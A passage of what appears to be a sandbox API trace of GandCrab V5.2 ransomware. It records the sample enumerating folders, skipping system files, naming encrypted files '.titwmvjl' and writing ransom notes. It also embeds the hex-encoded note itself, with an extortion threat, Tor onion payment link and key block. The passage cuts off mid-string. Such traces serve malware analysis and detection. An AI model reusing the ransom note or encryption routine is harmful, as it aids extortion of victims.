Explorer\\TITWMVJL-DECRYPT.txt") returned 81 [0096.296] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0096.296] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0096.296] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0096.296] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0096.296] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0096.296] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0096.296] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0096.296] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0096.296] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.296] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0096.296] FindClose (in: hFindFile=0x5038f8 | out: hFindFile=0x5038f8) returned 1 [0096.297] CloseHandle (hObject=0x2bc) returned 1 [0096.297] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0096.297] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0096.297] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0096.297] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\TITWMVJL-DECRYPT.txt" [0096.297] lstrlenW (lpString=".titwmvjl") returned 9 [0096.297] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\TITWMVJL-DECRYPT.txt") returned 63 [0096.297] VirtualAlloc (lpAddress=0x0, dwSize=0xbe, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.297] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 72 [0096.297] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\TITWMVJL-DECRYPT.txt") returned 63 [0096.297] lstrlenW (lpString=".txt") returned 4 [0096.297] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.298] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0096.298] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0096.298] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.298] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\TITWMVJL-DECRYPT.txt") returned 63 [0096.298] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\TITWMVJL-DECRYPT.txt") returned 63 [0096.298] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0096.298] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0096.298] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0096.298] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0096.298] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0096.298] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0096.298] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0096.298] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0096.298] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.298] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0096.298] lstrcmpW (lpString1="Windows", lpString2=".") returned 1 [0096.298] lstrcmpW (lpString1="Windows", lpString2="..") returned 1 [0096.299] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpString2="Windows" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows" [0096.299] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\" [0096.299] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.299] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.299] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 0 [0096.299] FindClose (in: hFindFile=0x503638 | out: hFindFile=0x503638) returned 1 [0096.300] CloseHandle (hObject=0x2b4) returned 1 [0096.300] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0096.300] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0096.300] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0096.300] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\Default\\AppData\\Roaming\\TITWMVJL-DECRYPT.txt" [0096.300] lstrlenW (lpString=".titwmvjl") returned 9 [0096.300] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\TITWMVJL-DECRYPT.txt") returned 53 [0096.300] VirtualAlloc (lpAddress=0x0, dwSize=0xaa, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.301] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 62 [0096.301] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\TITWMVJL-DECRYPT.txt") returned 53 [0096.301] lstrlenW (lpString=".txt") returned 4 [0096.301] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.301] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0096.301] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0096.301] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.301] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\TITWMVJL-DECRYPT.txt") returned 53 [0096.301] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\TITWMVJL-DECRYPT.txt") returned 53 [0096.301] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0096.301] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0096.301] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0096.301] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0096.301] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0096.301] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0096.301] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0096.301] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0096.301] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.302] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 0 [0096.302] FindClose (in: hFindFile=0x5034f8 | out: hFindFile=0x5034f8) returned 1 [0096.303] CloseHandle (hObject=0x2ac) returned 1 [0096.303] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.303] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0096.303] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0096.303] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\AppData\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\Default\\AppData\\TITWMVJL-DECRYPT.txt" [0096.303] lstrlenW (lpString=".titwmvjl") returned 9 [0096.303] lstrlenW (lpString="C:\\Users\\Default\\AppData\\TITWMVJL-DECRYPT.txt") returned 45 [0096.303] VirtualAlloc (lpAddress=0x0, dwSize=0x9a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.303] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\AppData\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 54 [0096.304] lstrlenW (lpString="C:\\Users\\Default\\AppData\\TITWMVJL-DECRYPT.txt") returned 45 [0096.304] lstrlenW (lpString=".txt") returned 4 [0096.304] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.304] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0096.304] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0096.304] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.304] lstrlenW (lpString="C:\\Users\\Default\\AppData\\TITWMVJL-DECRYPT.txt") returned 45 [0096.304] lstrlenW (lpString="C:\\Users\\Default\\AppData\\TITWMVJL-DECRYPT.txt") returned 45 [0096.304] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0096.304] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0096.304] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0096.304] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0096.304] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0096.304] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0096.304] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0096.304] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0096.304] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.304] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0 [0096.304] FindClose (in: hFindFile=0x503378 | out: hFindFile=0x503378) returned 1 [0096.305] CloseHandle (hObject=0x230) returned 1 [0096.305] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.305] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1 [0096.305] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1 [0096.305] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Application Data" | out: lpString1="C:\\Users\\Default\\Application Data") returned="C:\\Users\\Default\\Application Data" [0096.305] lstrcatW (in: lpString1="C:\\Users\\Default\\Application Data", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Application Data\\") returned="C:\\Users\\Default\\Application Data\\" [0096.305] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.305] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.305] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.306] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.306] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.306] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.306] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.306] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.306] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.306] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.306] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.306] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\Application Data\\\\TITWMVJL-DECRYPT.txt") returned 55 [0096.306] CreateFileW (lpFileName="C:\\Users\\Default\\Application Data\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\application data\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0096.307] GetLastError () returned 0x50 [0096.307] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.307] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.308] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x29, wMilliseconds=0x275)) [0096.308] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.308] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.308] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.308] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\Application Data\\d2ca4a09d2ca4deb61a.lock") returned 58 [0096.308] CreateFileW (lpFileName="C:\\Users\\Default\\Application Data\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\application data\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0096.309] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.309] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.309] lstrlenW (lpString="C:\\Users\\Default\\Application Data\\") returned 34 [0096.309] lstrcatW (in: lpString1="C:\\Users\\Default\\Application Data\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Application Data\\*") returned="C:\\Users\\Default\\Application Data\\*" [0096.309] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\Application Data\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0xffffffff [0096.309] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Application Data\\*", lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0xffffffff [0096.309] CloseHandle (hObject=0x230) returned 1 [0096.309] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.309] lstrcmpW (lpString1="Cookies", lpString2=".") returned 1 [0096.309] lstrcmpW (lpString1="Cookies", lpString2="..") returned 1 [0096.309] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Cookies" | out: lpString1="C:\\Users\\Default\\Cookies") returned="C:\\Users\\Default\\Cookies" [0096.310] lstrcatW (in: lpString1="C:\\Users\\Default\\Cookies", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Cookies\\") returned="C:\\Users\\Default\\Cookies\\" [0096.310] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.310] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.310] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.310] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.310] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.310] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.310] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.310] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.310] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.311] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.311] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.311] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\Cookies\\\\TITWMVJL-DECRYPT.txt") returned 46 [0096.311] CreateFileW (lpFileName="C:\\Users\\Default\\Cookies\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\cookies\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0096.312] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x5